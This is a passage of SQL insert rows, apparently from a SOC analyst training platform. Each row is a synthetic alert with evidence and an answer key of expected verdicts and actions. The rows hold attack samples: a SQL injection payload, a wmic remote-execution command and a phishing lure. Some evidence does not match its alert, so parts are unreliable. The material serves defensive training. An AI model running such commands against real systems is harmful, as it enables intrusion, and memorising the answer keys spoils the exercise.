4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:33Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"203.0.113.101\\\",\\\"username\\\":\\\"data.admin\\\",\\\"hostname\\\":\\\"data-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1629, 'Phishing Email with Malicious URL', 'high', 'Proofpoint', 'A phishing email was detected with a link to a malicious site mimicking a well-known login page.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:22:47Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"\",\"username\":\"victim.user@example.com\",\"hostname\":\"email-server\",\"request_body\":\"\",\"command_line\":\"\",\"email_sender\":\"spoofed@trusted.com\",\"url\":\"http://phishing.example.com/login\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"spoofed@trusted.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address used in recent phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishing.example.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting a phishing page designed to steal credentials.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing activities.\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contained a link to a known phishing site, which is an attempt to harvest user credentials.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious URL\",\"date\":\"2026-03-15T20:58:15.824Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1630, 'Potential False Positive: Unusual Spike in DNS Queries', 'low', 'Splunk', 'An unusual spike in DNS queries was observed, which could indicate either benign software update checks or potential data exfiltration attempts.', 'Suspicious Activity', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:07:12Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.1.60\",\"dst_ip\":\"\",\"username\":\"service_user\",\"hostname\":\"update-server\",\"request_body\":\"\",\"command_line\":\"\",\"domain\":\"update.example.com\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"update.example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Domain associated with legitimate software updates.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.60\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with update services.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\",\"analysis_notes\":\"The spike in DNS queries is related to legitimate software update checks, not malicious activity.\"}', 'Advanced', 'IR', 7, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.826Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:07:12Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"service_user\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"domain\\\":\\\"update.example.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.826Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:07:12Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"service_user\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"domain\\\":\\\"update.example.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.826Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:07:12Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"service_user\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"domain\\\":\\\"update.example.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.826Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:07:12Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"service_user\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"domain\\\":\\\"update.example.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.826Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:07:12Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"service_user\\\",\\\"hostname\\\":\\\"update-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"domain\\\":\\\"update.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1631, 'Unauthorized RDP Access Attempt', 'high', 'Wazuh', 'An unauthorized RDP access attempt was detected from an IP previously associated with brute force attacks.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:49:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.0.2.99\",\"dst_ip\":\"192.168.1.15\",\"username\":\"administrator\",\"hostname\":\"rdp-server\",\"request_body\":\"\",\"command_line\":\"\",\"failed_attempts\":27}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 512 times for unauthorized access attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the RDP server.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP has a history of malicious activity, indicating a genuine unauthorized access attempt.\"}', 'Advanced', 'IR', 7, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.828Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:49:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.99\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"rdp-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":27}\"},{\"timestamp\":\"2026-03-15T20:57:15.828Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:49:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.99\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"rdp-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":27}\"},{\"timestamp\":\"2026-03-15T20:56:15.828Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:49:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.99\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"rdp-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":27}\"},{\"timestamp\":\"2026-03-15T20:55:15.828Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:49:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.99\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"rdp-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":27}\"},{\"timestamp\":\"2026-03-15T20:54:15.828Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:49:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.99\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"rdp-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":27}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1632, 'Suspicious WMI Execution Detected', 'high', 'Velociraptor', 'WMI was used to execute a process remotely, commonly seen in lateral movements of ransomware attacks.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T15:04:55Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"192.168.1.45\",\"username\":\"attacker\",\"hostname\":\"management-console\",\"request_body\":\"\",\"command_line\":\"wmic /node:192.168.1.45 process call create \\\"cmd.exe /c calc.exe\\\"\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"wmic /node:192.168.1.45 process call create \\\"cmd.exe /c calc.exe\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Remote execution of commands using WMI is a known technique for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal management console IP.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of targeted machine.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI to execute commands on another machine suggests lateral movement within the network.\"}', 'Advanced', 'IR', 7, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.830Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:04:55Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"192.168.1.45\\\",\\\"username\\\":\\\"attacker\\\",\\\"hostname\\\":\\\"management-console\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"wmic /node:192.168.1.45 process call create \\\\\\\"cmd.exe /c calc.exe\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.830Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:04:55Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"192.168.1.45\\\",\\\"username\\\":\\\"attacker\\\",\\\"hostname\\\":\\\"management-console\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"wmic /node:192.168.1.45 process call create \\\\\\\"cmd.exe /c calc.exe\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.830Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:04:55Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"192.168.1.45\\\",\\\"username\\\":\\\"attacker\\\",\\\"hostname\\\":\\\"management-console\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"wmic /node:192.168.1.45 process call create \\\\\\\"cmd.exe /c calc.exe\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.830Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:04:55Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"192.168.1.45\\\",\\\"username\\\":\\\"attacker\\\",\\\"hostname\\\":\\\"management-console\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"wmic /node:192.168.1.45 process call create \\\\\\\"cmd.exe /c calc.exe\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.830Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:04:55Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"dst_ip\\\":\\\"192.168.1.45\\\",\\\"username\\\":\\\"attacker\\\",\\\"hostname\\\":\\\"management-console\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"wmic /node:192.168.1.45 process call create \\\\\\\"cmd.exe /c calc.exe\\\\\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1633, 'Suspicious Certutil Activity - False Positive', 'medium', 'FTK', 'Certutil.exe was used to check the hash of a file. Routine activity but flagged due to previous misuse in attacks.', 'Suspicious Activity', 'T1140', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T16:02:20Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.70\",\"dst_ip\":\"\",\"username\":\"it_support\",\"hostname\":\"support-pc\",\"request_body\":\"\",\"command_line\":\"certutil.exe -hashfile C:\\\\example.doc SHA256\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"certutil.exe -hashfile C:\\\\example.doc SHA256\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for legitimate file integrity checks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.70\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of an IT support machine.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\",\"analysis_notes\":\"Certutil was used for a legitimate purpose, as part of routine IT operations.\"}', 'Advanced', 'IR', 7, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.831Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:02:20Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"it_support\\\",\\\"hostname\\\":\\\"support-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"certutil.exe -hashfile C:\\\\\\\\example.doc 
SHA256\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.831Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:02:20Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"it_support\\\",\\\"hostname\\\":\\\"support-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"certutil.exe -hashfile C:\\\\\\\\example.doc SHA256\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.831Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:02:20Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"it_support\\\",\\\"hostname\\\":\\\"support-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"certutil.exe -hashfile C:\\\\\\\\example.doc SHA256\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.831Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:02:20Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"it_support\\\",\\\"hostname\\\":\\\"support-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"certutil.exe -hashfile C:\\\\\\\\example.doc SHA256\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.831Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:02:20Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"it_support\\\",\\\"hostname\\\":\\\"support-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"certutil.exe -hashfile C:\\\\\\\\example.doc SHA256\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1634, 'Malicious Web Request with SQL Injection Payload', 'critical', 'Firewall', 'A web request containing a SQL injection payload was detected targeting the finance application server.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:18:39Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.14\",\"dst_ip\":\"192.168.1.55\",\"username\":\"\",\"hostname\":\"finance-app\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"command_line\":\"\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple web application attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server hosting finance application.\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload is a classic tautology-based SQL injection (OR 1=1 followed by a comment marker) aimed at the finance application. Before closing, confirm from the application and database logs whether the request produced a database error or returned unexpected rows, because a successful injection changes the required actions from blocking to incident response; blocking the source IP limits this one sender but does not fix the injectable parameter, which needs parameterized queries in the application.\"}', 'Advanced', 'IR', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1635, 'Encoded PowerShell Command Execution - False Positive', 'medium', 'Velociraptor', 'PowerShell executed an encoded command. Upon further inspection, it was a scheduled maintenance script.', 'Suspicious Activity', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:55:17Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.80\",\"dst_ip\":\"\",\"username\":\"maintenance_user\",\"hostname\":\"maintenance-server\",\"request_body\":\"\",\"command_line\":\"powershell.exe -enc JAB1AHAAZABhAHQAZQAtAGYAbwBsAGQAZQBy\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc JAB1AHAAZABhAHQAZQAtAGYAbwBsAGQAZQBy\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used in scheduled maintenance scripts.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.80\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server IP used for maintenance tasks.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\",\"analysis_notes\":\"The encoded PowerShell command is part of a legitimate scheduled task, not malicious activity. The -enc argument is base64 of UTF-16LE text and decodes to $update-folder, a bare variable reference with no download, network or execution logic; a verdict on any encoded command should rest on the decoded content and on the parent process or scheduled task that launched it, never on the account name alone.\"}', 'Advanced', 'IR', 7, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:55:17Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.80\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB1AHAAZABhAHQAZQAtAGYAbwBsAGQAZQBy\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:55:17Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.80\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB1AHAAZABhAHQAZQAtAGYAbwBsAGQAZQBy\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:55:17Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.80\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB1AHAAZABhAHQAZQAtAGYAbwBsAGQAZQBy\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:55:17Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.80\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"maintenance_user\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -enc JAB1AHAAZABhAHQAZQAtAGYAbwBsAGQAZQBy\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 